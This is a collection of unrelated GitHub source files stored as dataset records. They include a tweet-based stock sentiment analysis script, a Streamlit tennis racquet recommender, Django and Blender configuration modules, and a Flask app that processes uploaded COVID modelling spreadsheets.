df\n \"\"\"\n list1, list2 = zip(*list_tup)\n df = pd.DataFrame(list1, columns=['word'])\n df['frequency'] = list2\n return df\n\n\ndef create_df_from_list_tuple_two_words(list_tup):\n \"\"\"\n converts a list of tuples into a df\n :param list_tup: list of tuple (word,word,number)\n :return: a df\n \"\"\"\n list1, list2 = zip(*list_tup)\n df = pd.DataFrame(list(list1), columns=['first word', 'second word'])\n df['frequency'] = list2\n return df\n\n\ndef validate_top_unigrams(l_unigrams):\n \"\"\"\n the function validates the top 10 list of unigrams\n :param l_unigrams: the list of unigrams\n :return: the top 10 validated unigrams\n \"\"\"\n counter = 0\n verified_list = []\n for p in l_unigrams:\n if p[0] and p[0] != '️' and p[0] != 'quot':\n verified_list.append(p)\n counter = counter + 1\n if counter == 10:\n break\n return verified_list\n\n\ndef validate_top_bigrams(l_bigrams):\n \"\"\"\n the function validates the top 10 list of bigrams\n :param l_bigrams: the list of bigrams\n :return: the top 10 validated bigrams\n \"\"\"\n counter = 0\n verified_list = []\n for p in l_bigrams:\n exp = p[0]\n if exp[0] != '' and exp[0] != 'lt' and exp[1] != '️':\n verified_list.append(p)\n counter = counter + 1\n if counter == 10:\n break\n return verified_list\n\n\n\ndef show_most_common_terms(df):\n \"\"\"\n the function shows the most common terms in each of the df\n :param df: the df\n :return: 2 df of common terms (prints it)\n \"\"\"\n # transform the strings to tokens\n tokens = transform_tweets_to_tokens(df['tweet'].values)\n flat_tokens = [item for sublist in tokens for item in sublist]\n\n # most 10 common terms\n tokens_unigrams = nltk.FreqDist(flat_tokens)\n tokens_bigrams = nltk.FreqDist(nltk.bigrams(flat_tokens))\n top_10_unigrams = validate_top_unigrams(tokens_unigrams.most_common(50))\n top_10_bigrams = validate_top_bigrams(tokens_bigrams.most_common(50))\n df_unigrams = create_df_from_list_tuple(top_10_unigrams)\n print(df_unigrams)\n df_bigrams = create_df_from_list_tuple_two_words(top_10_bigrams)\n print(df_bigrams)\n\n\nfor df, name in zip(list_stocks, list_names_stocks):\n print(f\"The most common terms of {name} stock are:\")\n print()\n show_most_common_terms(df)\n print()\n\n\ndef show_most_popular_tags_hashtags(df):\n \"\"\"\n the function print the most common hashtags and tags in a df\n :param df: a df\n :return: print the most common hashtags and tags\n \"\"\"\n all_tweets = df.loc[df['tweet'] != None]\n all_tweets['all_hashtags'] = all_tweets['tweet'].apply(find_all_hashtags)\n all_tweets['all_tags'] = all_tweets['tweet'].apply(find_all_tags)\n\n tweet_hashtags = list(all_tweets['all_hashtags'])\n tweet_tags = list(all_tweets['all_tags'])\n\n # create one flat list\n flat_hashtags = [item for sublist in tweet_hashtags for item in sublist]\n flat_tags = [item for sublist in tweet_tags for item in sublist]\n\n count_hashtags = Counter(flat_hashtags)\n count_tag = Counter(flat_tags)\n\n df1 = pd.DataFrame(count_hashtags.items(), columns=['Hashtag', 'Count']).sort_values(by=['Count'], ascending=False)\n df2 = pd.DataFrame(count_tag.items(), columns=['Tag', 'Count']).sort_values(by=['Count'], ascending=False)\n\n df1 = df1[df1.Hashtag.apply(lambda x: len(str(x))>1)]\n df2 = df2[df2.Tag.apply(lambda x: len(str(x))>1)]\n\n blankIndex = [''] * len(df1)\n df1.index = blankIndex\n blankIndex = [''] * len(df2)\n df2.index = blankIndex\n\n print()\n print(\"Most popular hashtags:\")\n print()\n print(df1.head(10))\n print()\n print(\"Most popular tags:\")\n print(df2.head(10))\n\n\nfor df, name in zip(list_stocks, list_names_stocks):\n print(f\"The most common Hashtags and Tags of {name} stock are:\")\n print()\n show_most_popular_tags_hashtags(df)\n print()\n\n\ndef sum_tweets_per_day(list_stocks, list_names_stocks):\n \"\"\"\n the function sums the number of tweets per day\n :param list_stocks: the list of stocks we want to count\n :param list_names_stocks: the names of the stocks\n :return: a list of df\n \"\"\"\n list_amount_tweets = []\n for df, name in zip(list_stocks, list_names_stocks):\n print(f\"Count per day in {name}:\")\n sum_tweets_per_day = df.groupby('date')['tweet'].count().reset_index(name=\"count\")\n list_amount_tweets.append(sum_tweets_per_day)\n print(sum_tweets_per_day)\n print()\n return list_amount_tweets\n\n\nlist_tweets_per_day = sum_tweets_per_day(list_stocks, list_names_stocks)\n\n\ndef autolabel(ax, rects):\n \"\"\"\n Attach a text label above each bar in *rects*, displaying its height\n :param ax: the plot object\n :param rects: the labels\n :return: formatted labels\n \"\"\"\n for rect in rects:\n height = round(rect.get_height(),2)\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\n\ndef cut_label_trends(data):\n \"\"\"\n the function takes the full date labels and converts the year into a short view\n :param data: the label\n :return: a new short label\n \"\"\"\n labels = []\n for i in data:\n temp = i.strftime('%Y-%m-%d')\n labels.append(temp)\n return labels\n\n\ndef show_plots_of_compare(results, title):\n \"\"\"\n the function creates the plot\n :param results: a list of tuple\n :param title: the title of the plot\n :return: the plot\n \"\"\"\n results = [[x[i] for x in results] for i in range(7)]\n # [facebook, amazon, apple, google, tesla, netflix]\n days, tweets_facebook, tweets_amazon, tweets_apple,\\\n tweets_google, tweets_tesla, tweets_netflix = results\n tweets_facebook_g = np.array(tweets_facebook) / np.max(tweets_facebook)\n tweets_amazon_g = np.array(tweets_amazon) / np.max(tweets_amazon)\n tweets_apple_g = np.array(tweets_apple) / np.max(tweets_apple)\n tweets_google_g = np.array(tweets_google) / np.max(tweets_google)\n tweets_tesla_g = np.array(tweets_tesla) / np.max(tweets_tesla)\n tweets_netflix_g = np.array(tweets_netflix) / np.max(tweets_netflix)\n\n\n labels = []\n for b, c, d, e, f, g in zip(tweets_facebook_g, tweets_amazon_g, tweets_apple_g,\n tweets_google_g, tweets_tesla_g, tweets_netflix_g):\n labels.append(round(b,2))\n labels.append(round(c,2))\n labels.append(round(d,2))\n labels.append(round(e,2))\n labels.append(round(f,2))\n labels.append(round(g,2))\n\n a = np.arange(8)\n w = 0.1\n fig, ax = plt.subplots(figsize=(30, 7), edgecolor='k')\n ax.set_xticklabels(days)\n p1 = ax.bar(a+w, tweets_facebook_g, w, color='cornflowerblue')\n p2 = ax.bar(a-w, tweets_amazon_g, w, color='peachpuff')\n p3 = ax.bar(a+2*w, tweets_apple_g, w, color='lightpink')\n p4 = ax.bar(a-2*w, tweets_google_g, w, color='lightyellow')\n p5 = ax.bar(a+3*w, tweets_tesla_g, w, color='peachpuff')\n p6 = ax.bar(a, tweets_netflix_g, w, color='lightcoral')\n ax.set_xticks(a)\n ax.set_title(title)\n # Evaluation of the models\n ax.legend((p1[0], p2[0], p3[0], p4[0], p5[0], p6[0]),\n ('facebook', 'amazon', 'apple', 'google', 'tesla', 'netflix'))\n plt.xlabel('Days')\n plt.ylabel('Ratio number of tweets')\n autolabel(ax, p1)\n autolabel(ax, p2)\n autolabel(ax, p3)\n autolabel(ax, p4)\n autolabel(ax, p5)\n autolabel(ax, p6)\n plt.show()\n\nfacebook_count_days, amazon_count_days, apple_count_days, google_count_days,\\\ntesla_count_days, netflix_count_days = list_tweets_per_day\n\n\nall_data_to_graph = []\nnew_labels = cut_label_trends(facebook_count_days['date'])\nfor a, b, c, d, e, f, g in zip(list(new_labels),\n list(facebook_count_days['count']),\n list(amazon_count_days['count']),\n list(apple_count_days['count']),\n list(google_count_days['count']),\n list(tesla_count_days['count']),\n list(netflix_count_days['count'])):\n all_data_to_graph.append((a,b,c,d,e,f,g))\nprint(all_data_to_graph)\nshow_plots_of_compare(all_data_to_graph, 'Visual Compare between the days')\n\n# GOOGLE TRENDS\n\ndef cut_label_google_trends(row):\n \"\"\"\n converts the date from google trends csv to new format\n :param row: the row in the df\n :return: a new formatted date\n \"\"\"\n values = row.split(\"/\")\n month = values[0]\n day = values[1]\n return str(day)+\"-\"+str(month)+\"-21\"\n\ngoogle_trend = pd.read_csv(\"google_trends.csv\")\ngoogle_trend['date'] = google_trend['date'].apply(cut_label_google_trends)\ngoogle_trend = google_trend.set_index(['date'])\nlines = google_trend.plot.line()\nplt.title(\"Google Trends per day\")\nplt.ylabel(\"Ratio amount of searches\")\nplt.legend(bbox_to_anchor=(0.9, 0.6))\nplt.show()\n\n# TRENDS OF TWEETS\n\ndef prepare_dictionary(list_of_words):\n \"\"\"\n gets a list of words and creates a set after normalizing the list\n :param list_of_words: the list of words\n :return: a set\n \"\"\"\n stop_free = [i.strip() for i in list_of_words if i not in stop and i and i == i]\n lower_case = [word.lower() for word in stop_free if word and word == word]\n normalized = [lemma.lemmatize(word) for word in lower_case if word]\n new_set = set(normalized)\n return new_set\n\ndictionary_of_stocks = pd.read_csv(\"stock_market_dictionary.csv\")\nset_negative = prepare_dictionary(list(dictionary_of_stocks['Negative']))\nset_positive = prepare_dictionary(list(dictionary_of_stocks['Positive']))\nset_uncertainty = prepare_dictionary(list(dictionary_of_stocks['Uncertainty']))\n\n\ndef split_a_tweet(row):\n \"\"\"\n splits a tweet in a df\n :param row: the tweet\n :return: list of tokens\n \"\"\"\n return row.split()\n\n\ndef count_trend(row):\n \"\"\"\n count how many times a certain word from the stock market dictionary exists\n :param row: the row of a df\n :return: the most common behaviour\n \"\"\"\n count_positive = 0\n count_negative = 0\n count_uncertainty = 0\n if row:\n if len(row) > 0:\n for item in row:\n if item in set_positive:\n count_positive += 1\n elif item in set_negative:\n count_negative += 1\n elif item in set_uncertainty:\n count_uncertainty += 1\n if count_negative + count_negative + count_uncertainty == 0:\n return \"None\"\n stats = {\"positive\": count_positive, \"negative\": count_negative, \"uncertainty\": count_uncertainty}\n result = max(stats.items(), key=operator.itemgetter(1))[0]\n return result\n\n\nfor df, name in zip(list_stocks, list_names_stocks):\n df['tokens'] = df['tweet'].apply(split_a_tweet)\n df['tokens'] = df['tokens'].apply(normalize_word)\n df['trend'] = df['tokens'].apply(count_trend)\n c = collections.Counter(list(df['trend']))\n print(f\"The distribution of trend of the stock if {name} is:\")\n print(c)\n print()\n\n\ndef filter_trends(list_stocks):\n \"\"\"\n the function filter the tweets that doesn't have any trend\n :param list_stocks: the list of df of stocks\n :return: a list of filtered df\n \"\"\"\n new_list_stocks = []\n for df in list_stocks:\n df = df[(df['trend'] != 'None')]\n new_list_stocks.append(df)\n return new_list_stocks\n\n\n\n# Trend Analysis for each stock\n\nlist_stocks_filtered = filter_trends(list_stocks)\n\ndef remove_r(row):\n row = row.replace('\\r', \"\")\n return row\n\nlist_sum_trends = []\nfor item, name in zip(list_stocks_filtered, list_names_stocks):\n item['trend'] = item['trend'].apply(remove_r)\n sum_tweets_per_day = item.groupby(['date','trend'])['trend'].count().reset_index(name=\"count_trend\")\n cols = ['date', 'trend', 'count_trend']\n sum_tweets_per_day.columns = cols\n print(f\"The trends df of {name}:\")\n print(sum_tweets_per_day)\n print()\n # sum_tweets_per_day.to_csv(\"summary_stocks_trends/trend_stock_\"+name+\".csv\", index=False)\n list_sum_trends.append(sum_tweets_per_day)\n\n\ndef show_plots_of_compare_trends_stock(results, title):\n \"\"\"\n the function creates the plot and shows\n :param results: a list of tuple\n :param title: the title of the plot\n :return: the plot\n \"\"\"\n results = [[x[i] for x in results] for i in range(4)]\n # [facebook, amazon, apple, google, tesla, netflix]\n days, tweets_pos, tweets_neg, tweet_un = results\n tweets_pos_g = np.array(tweets_pos)\n tweets_neg_g = np.array(tweets_neg)\n tweet_un_g = np.array(tweet_un)\n\n\n labels = []\n for b, c, d, in zip(tweets_pos_g, tweets_neg_g, tweet_un_g):\n labels.append(round(b,2))\n labels.append(round(c,2))\n labels.append(round(d,2))\n\n a = np.arange(8)\n w = 0.1\n fig, ax = plt.subplots(figsize=(30, 7), edgecolor='k')\n ax.set_xticklabels(days)\n p1 = ax.bar(a+w, tweets_pos_g, w, color='cornflowerblue')\n p2 = ax.bar(a-w, tweets_neg_g, w, color='peachpuff')\n p3 = ax.bar(a, tweet_un_g, w, color='lightpink')\n ax.set_xticks(a)\n ax.set_title(title)\n # Evaluation of the models\n ax.legend((p1[0], p2[0], p3[0]),\n ('positive', 'negative', 'uncertainty'))\n plt.xlabel('Days')\n plt.ylabel('Ratio number of tweets')\n autolabel(ax, p1)\n autolabel(ax, p2)\n autolabel(ax, p3)\n plt.show()\n\nfor item, name in zip(list_sum_trends, list_names_stocks):\n pos = item[(item['trend'] == 'positive')]\n neg = item[(item['trend'] == 'negative')]\n uncertainty = item[(item['trend'] == 'uncertainty')]\n list_pos = list(pos['count_trend'])\n list_neg = list(neg['count_trend'])\n list_uncertainty = list(uncertainty['count_trend'])\n print(list_pos)\n print(list_neg)\n print(list_uncertainty)\n all_data_to_graph = []\n new_labels = ['04-05-21', '05-05-21', '06-05-21', '07-05-21',\n '08-05-21', '09-05-21', '10-05-21', '11-05-21']\n for a, b, c, d in zip(list(new_labels),\n list(list_pos),\n list(list_neg),\n list(list_uncertainty)):\n all_data_to_graph.append((a, b, c, d))\n print(all_data_to_graph)\n show_plots_of_compare_trends_stock(all_data_to_graph, name+\"- trend analysis\")\n\n","repo_name":"tomersein/AlgoTradeProject","sub_path":"AlgoTrade.py","file_name":"AlgoTrade.py","file_ext":"py","file_size_in_byte":22071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16240432681","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ndef recommend_racquets(user_preferences, df, N=5):\n # Create a DataFrame with user preferences\n user_df = pd.DataFrame(user_preferences, index=[0])\n\n # Fill missing values with mean for numeric columns and replace infinity with maximum finite value\n df_numeric = df.select_dtypes(include=[np.number])\n df_filled = df.copy()\n df_filled[df_numeric.columns] = df_numeric.fillna(df_numeric.mean()).replace([np.inf, -np.inf], np.finfo('float64').max)\n\n user_df_filled = user_df.copy()\n user_df_filled[df_numeric.columns] = user_df[df_numeric.columns].fillna(df_numeric.mean()).replace([np.inf, -np.inf], np.finfo('float64').max)\n\n # Compute cosine similarity between user preferences and racquets\n similarity_scores = cosine_similarity(user_df_filled[df_numeric.columns], df_filled[df_numeric.columns])\n\n # Get indices of top N racquets\n top_racquet_indices = similarity_scores[0].argsort()[-N:][::-1]\n\n # Return these racquets\n return df.iloc[top_racquet_indices]\n\n\n\n\n# Define mappings\nracquet_type_mapping = {\n 'All Around Racquets': 1.0,\n \"Traditional Player's Racquets\": 2.0,\n 'Spin Racquets': 3.0,\n 'Power Racquets': 4.0\n}\n\nstroke_style_mapping = {\n 'Compact': 1.0,\n 'Compact-Medium': 2.0,\n 'Medium': 3.0,\n 'Medium-Full': 4.0,\n 'Full': 5.0\n}\n\npower_level_mapping = {\n 'Low': 1.0,\n 'Low-Medium': 2.0,\n 'Medium': 3.0,\n 'Medium-High': 4.0,\n 'High': 5.0\n}\n\n# Read data\ndf = pd.read_csv('selected.csv')\n\n# Define composition_mapping\ncomposition_mapping = {category: i for i, category in enumerate(df['Composition:'].unique())}\n\n# Display title\nst.title('Tennis Racquet Recommendation System')\n\n# Get user input\nnumeric_columns = [\"Head Size:\", \"Length:\", \"Strung Weight:\", \"Swingweight:\", \"Stiffness:\", \"Price\"]\nfor col in numeric_columns:\n df[col] = pd.to_numeric(df[col], errors='coerce')\n\nhead_size = st.slider(\"Head Size (cm):\", float(df[\"Head Size:\"].min()), float(df[\"Head Size:\"].max()))\nlength = st.slider(\"Length (cm):\", float(df[\"Length:\"].min()), float(df[\"Length:\"].max()))\nstrung_weight = st.slider(\"Strung Weight (g):\", float(df[\"Strung Weight:\"].min()), float(df[\"Strung Weight:\"].max()))\nswingweight = st.slider(\"Swingweight:\", float(df[\"Swingweight:\"].min()), float(df[\"Swingweight:\"].max()))\nstiffness = st.slider(\"Stiffness:\", float(df[\"Stiffness:\"].min()), float(df[\"Stiffness:\"].max()))\nprice = st.slider(\"Price ($):\", float(df[\"Price\"].min()), float(df[\"Price\"].max()))\nracquet_type = st.selectbox('Racquet Type', list(racquet_type_mapping.keys()))\ncomposition = st.selectbox('Composition:', list(df['Composition:'].unique()))\npower_level = st.selectbox('Power Level:', list(power_level_mapping.keys()))\nstroke_style = st.selectbox('Stroke Style:', list(stroke_style_mapping.keys()))\n\n# Get user input\n# ... (your existing code to get user input)\n\n# Add button\nif st.button('Get Recommendations'):\n user_preferences = {\n \"Head Size:\": head_size, \n \"Length:\": length, \n \"Strung Weight:\": strung_weight, \n \"Swingweight:\": swingweight, \n \"Stiffness:\": stiffness, \n \"Price\": price, \n \"Racquet Type\": racquet_type_mapping[racquet_type],\n \"Composition:\": composition_mapping[composition], \n \"Power Level:\": power_level_mapping[power_level], \n \"Stroke Style:\": stroke_style_mapping[stroke_style]\n }\n\n # Get recommendations\n recommended_racquets = recommend_racquets(user_preferences, df)\n\n # Display recommendations\n st.header('Recommended Racquets:')\n st.table(recommended_racquets)\n","repo_name":"Mawuli-Akpey/Racquet-Recommender","sub_path":"racquet.py","file_name":"racquet.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10006731712","text":"#!/bin/python3\n\ni = list(range(1, 11))\n\n\nif __name__ == '__main__':\n n = int(input())\n\n\nfor l in i:\n print(str(n) +' x '+ str(i[l -1]) + ' = ' + str(n*i[l-1]))\n","repo_name":"arwildo/hacker-rank","sub_path":"30DaysOfCode/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71328267074","text":"# -*- coding: utf-8 -*-\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nAPI_KEY = os.getenv(\"API_KEY\", None)\nFCM_KEY = os.getenv(\"FCM_KEY\", None)\nFIREBASE_PROJECT_ID = os.getenv(\"FCM_ID\", None)\nDATABASE_CONFIG = os.getenv(\"DATABASE_CONFIG\", None)\nDATABASE_CONFIG_LOCAL = os.getenv(\"DATABASE_CONFIG_LOCAL\", None)\nFIREBASE_UID = os.getenv(\"FIREBASE_UID\", None)\nFIREBASE_NAME = os.getenv(\"FIREBASE_NAME\", None)\nFIREBASE_EMAIL = os.getenv(\"FIREBASE_EMAIL\", None)","repo_name":"Flaviommrs/MC855-Unimapa","sub_path":"backend/src/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36573693513","text":"import bpy\n\n\nkeymap = None\n\n\ndef register(keyconfig: bpy.types.KeyConfig):\n global keymap\n\n if keymap is None:\n keymap = keyconfig.keymaps.new(name=\"3D View\", space_type=\"VIEW_3D\")\n\n item = keymap.keymap_items.new('wm.call_menu_pie', 'Z', 'PRESS')\n item.properties.name = 'ALTPIES_MT_ShadingPie'\n\n item = keymap.keymap_items.new('wm.call_menu_pie', 'ACCENT_GRAVE', 'PRESS')\n item.properties.name = 'ALTPIES_MT_ViewPie'\n\n\ndef unregister(keyconfig: bpy.types.KeyConfig):\n global keymap\n\n if keymap is not None:\n keyconfig.keymaps.remove(keymap)\n\n keymap = None\n","repo_name":"bonjorno7/AlternativePies","sub_path":"addon/keymaps/view_3d.py","file_name":"view_3d.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12986084129","text":"\"\"\"\nLocal settings for arcadia website project.\n\n- Run in Debug mode\n\n- Use mailhog for emails via Docker\n\n- Add Django Debug Toolbar\n- Add django-extensions as app\n\"\"\"\n\nfrom .base import * # noqa\n\n# DEBUG\n# ------------------------------------------------------------------------------\nDEBUG = env.bool('DJANGO_DEBUG', default=True)\nTEMPLATES[0]['OPTIONS']['debug'] = DEBUG\n\n# SECRET CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n# Note: This key only used for development and testing.\nSECRET_KEY = env('DJANGO_SECRET_KEY', default='d)^%-H!-TBj$cBY/[J7^kd?Z!?B15$p5kw@B+jWcMa.({qHSXV')\n\n# Mail settings\n# ------------------------------------------------------------------------------\n\nEMAIL_PORT = 1025\n\nEMAIL_HOST = env('EMAIL_HOST', default='mailhog')\n\n\n# ALLOWED HOSTS\nALLOWED_HOSTS = env.list('DJANGO_ALLOWED_HOSTS', default=['192.168.99.100', ])\nprint(\"ALLOWED_HOSTS: \", ALLOWED_HOSTS)\n\n# CACHING\n# ------------------------------------------------------------------------------\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n 'LOCATION': ''\n }\n}\n\n# django-debug-toolbar\n# ------------------------------------------------------------------------------\nMIDDLEWARE += ['debug_toolbar.middleware.DebugToolbarMiddleware', ]\nINSTALLED_APPS += ['debug_toolbar', ]\n\nINTERNAL_IPS = ['127.0.0.1', '10.0.2.2', ]\n\n\nimport socket\nimport os\n# tricks to have debug toolbar when developing with docker\n# if os.environ.get('USE_DOCKER') == 'yes':\n# ip = socket.gethostbyname(socket.gethostname())\n# INTERNAL_IPS += [ip[:-1] + '1']\n\nhostname, _, ips = socket.gethostbyname_ex(socket.gethostname())\nINTERNAL_IPS += [ip[:-1] + '1' for ip in ips]\n\nDEBUG_TOOLBAR_CONFIG = {\n 'DISABLE_PANELS': [\n 'debug_toolbar.panels.redirects.RedirectsPanel',\n ],\n 'SHOW_TEMPLATE_CONTEXT': True,\n}\n\n# django-extensions\n# ------------------------------------------------------------------------------\nINSTALLED_APPS += ['django_extensions', ]\n\n# TESTING\n# ------------------------------------------------------------------------------\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\n\n# Custom Admin URL, use {% url 'admin:index' %}\nADMIN_URL = env('DJANGO_ADMIN_URL')\n\n# Your local stuff: Below this line define 3rd party library settings\n# ------------------------------------------------------------------------------\n","repo_name":"ArcadiaLandTrust/arcadia_website","sub_path":"config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26664250054","text":"\n\nfrom flask import Flask, render_template, request\nfrom werkzeug import secure_filename\nimport os, json#, boto3\nimport subprocess\nimport pandas as pd\nfrom datetime import date\nimport csv\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER']='filein/'\napp = Flask(__name__, static_url_path = \"/assets\", static_folder = \"output\")\n\n@app.route('/brain_beats_virus')\ndef upload_file():\n return render_template('richtext.html')\n \n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods', 'GET, POST, PATCH, DELETE, OPTIONS')\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n@app.route('/uploader', methods = ['GET', 'POST'])\ndef uploader_file():\n if request.method == 'POST':\n #print(\"Before bucket\")\n #S3_BUCKET = os.environ.get('S3_BUCKET')\n #print(\"Entering uploader\")\n f = request.files['file']\n f.save('filein/'+f.filename)\n print(\"request files caught\")\n #f = request.form\n #for key in f.keys():\n # for value in f.getlist(key):\n # print(key,\":\",value)\n text1 = request.form['lagebeurteilung']\n text2 = request.form['value_infectious']\n text3 = request.form['viral']\n text4 = request.form['dunkelziffer']\n text5 = request.form['viruskontakt']\n print(\"Got all the forms\")\n with open(os.path.join(\"app/output/\", \"text1.txt\"), \"w\") as text_file:\n text_file.write(text1)\n with open(os.path.join(\"app/output/\", \"text2.txt\"), \"w\") as text_file:\n text_file.write(text2)\n with open(os.path.join(\"app/output/\", \"text3.txt\"), \"w\") as text_file:\n text_file.write(text3)\n with open(os.path.join(\"app/output/\", \"text4.txt\"), \"w\") as text_file:\n text_file.write(text4)\n with open(os.path.join(\"app/output/\", \"text5.txt\"), \"w\") as text_file:\n text_file.write(text5)\n #subprocess.call(\"Rscript ./easy_way.R\", shell=True)\n #s3 = boto3.resource('s3')\n #s3.Bucket(S3_BUCKET).upload_file('app/output/data.csv','data.csv',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/lastupdate.csv','lastupdate.csv',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text1.txt','text1.txt',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text2.txt','text2.txt',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text3.txt','text3.txt',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text4.txt','text4.txt',ExtraArgs={'ACL':'public-read'})\n #s3.Bucket(S3_BUCKET).upload_file('app/output/text5.txt','text5.txt',ExtraArgs={'ACL':'public-read'})\n run_script()\n\n\n\n return 'Datei wurde erfolgreich gesendet.'\n\nif __name__ == '__main__':\n app.run(debug = True)\n \ndef run_script():\n print(\"normal\")\n chbase5 = pd.read_excel (\"filein/Corona_Virus_2020_actual.xlsx\",engine=\"openpyxl\",sheet_name=\"CH base Impf\",skiprows=45,usecols=[0,21,22,24,26,45,49,51,86,88])\n\n new_cols=[\"Datum\",\"Viral_Pot\",\"Dunkelziffer\",\"V24\",\"Value_Infectious\",\"V45\",\"Free_Viral\",\"Geimpfte\",\"Viralität_in_Proz\",\"Viralität_pro_X\"]\n new_names_map = {chbase5.columns[i]:new_cols[i] for i in range(len(new_cols))}\n chbase5.rename(new_names_map, axis=1, inplace=True)\n\n chbase5.Viralität_pro_X=chbase5.Viralität_pro_X/25\n chbase5.Viralität_in_Proz=chbase5.Viralität_in_Proz*100\n chbase5['Menschen_mit_Viruskontakt']=chbase5.V45*chbase5.V24*100\n\n chbase5.Geimpfte=chbase5.Geimpfte.fillna(0)\n\n print(chbase5.size)\n chbase5.dropna(subset=['Datum'],inplace=True)\n chbase5.dropna(subset=['Viral_Pot'],inplace=True)\n print(chbase5.size)\n\n chbase5=chbase5[[\"Datum\",\"Viral_Pot\",\"Value_Infectious\",\"Free_Viral\",\"Viralität_in_Proz\",\"Viralität_pro_X\",\"Dunkelziffer\",\"Menschen_mit_Viruskontakt\",\"Geimpfte\"]]\n\n\n print(\"Plus\")\n chbaseplus5 = pd.read_excel (\"filein/Corona_Virus_2020_actual.xlsx\",engine=\"openpyxl\",sheet_name=\"CH base+ Impf\",skiprows=45,usecols=[0,21,22,24,26,45,49,51,86,88])\n\n new_cols=[\"Datum\",\"Viral_Pot_Plus\",\"Dunkelziffer_Plus\",\"V24\",\"Value_Infectious_Plus\",\"V45\",\"Free_Viral_Plus\",\"Geimpfte_Plus\",\"Viralität_in_Proz_Plus\",\"Viralität_pro_X_Plus\"]\n new_names_map = {chbaseplus5.columns[i]:new_cols[i] for i in range(len(new_cols))}\n chbaseplus5.rename(new_names_map, axis=1, inplace=True)\n\n chbaseplus5.Viralität_pro_X_Plus=chbaseplus5.Viralität_pro_X_Plus/25\n chbaseplus5.Viralität_in_Proz_Plus=chbaseplus5.Viralität_in_Proz_Plus*100\n chbaseplus5['Menschen_mit_Viruskontakt_Plus']=chbaseplus5.V45*chbaseplus5.V24*100\n\n chbaseplus5.Geimpfte_Plus=chbaseplus5.Geimpfte_Plus.fillna(0)\n\n print(chbaseplus5.size)\n chbaseplus5.dropna(subset=['Datum'],inplace=True)\n chbaseplus5.dropna(subset=['Viral_Pot_Plus'],inplace=True)\n print(chbaseplus5.size)\n\n chbaseplus5=chbaseplus5[[\"Datum\",\"Viral_Pot_Plus\",\"Value_Infectious_Plus\",\"Free_Viral_Plus\",\"Viralität_in_Proz_Plus\",\"Viralität_pro_X_Plus\",\"Dunkelziffer_Plus\",\"Menschen_mit_Viruskontakt_Plus\",\"Geimpfte_Plus\"]]\n\n\n print(\"Opt\")\n chbaseopt5 = pd.read_excel (\"filein/Corona_Virus_2020_actual.xlsx\",engine=\"openpyxl\",sheet_name=\"CH opt Impf \",skiprows=45,usecols=[0,21,22,24,26,45,49,51,86,88])\n\n new_cols=[\"Datum\",\"Viral_Pot_Opt\",\"Dunkelziffer_Opt\",\"V24\",\"Value_Infectious_Opt\",\"V45\",\"Free_Viral_Opt\",\"Geimpfte_Opt\",\"Viralität_in_Proz_Opt\",\"Viralität_pro_X_Opt\"]\n new_names_map = {chbaseopt5.columns[i]:new_cols[i] for i in range(len(new_cols))}\n chbaseopt5.rename(new_names_map, axis=1, inplace=True)\n\n chbaseopt5.Viralität_pro_X_Opt=chbaseopt5.Viralität_pro_X_Opt/25\n chbaseopt5.Viralität_in_Proz_Opt=chbaseopt5.Viralität_in_Proz_Opt*100\n chbaseopt5['Menschen_mit_Viruskontakt_Opt']=chbaseopt5.V45*chbaseopt5.V24*100\n\n chbaseopt5.Geimpfte_Opt=chbaseopt5.Geimpfte_Opt.fillna(0)\n\n print(chbaseopt5.size)\n chbaseopt5.dropna(subset=['Datum'],inplace=True)\n chbaseopt5.dropna(subset=['Viral_Pot_Opt'],inplace=True)\n print(chbaseopt5.size)\n\n chbaseopt5=chbaseopt5[[\"Datum\",\"Viral_Pot_Opt\",\"Value_Infectious_Opt\",\"Free_Viral_Opt\",\"Viralität_in_Proz_Opt\",\"Viralität_pro_X_Opt\",\"Dunkelziffer_Opt\",\"Menschen_mit_Viruskontakt_Opt\",\"Geimpfte_Opt\"]]\n\n print(\"Pess\")\n chbasepess5 = pd.read_excel (\"filein/Corona_Virus_2020_actual.xlsx\",engine=\"openpyxl\",sheet_name=\"CH pess Impf\",skiprows=45,usecols=[0,21,22,24,26,45,49,51,86,88])\n\n 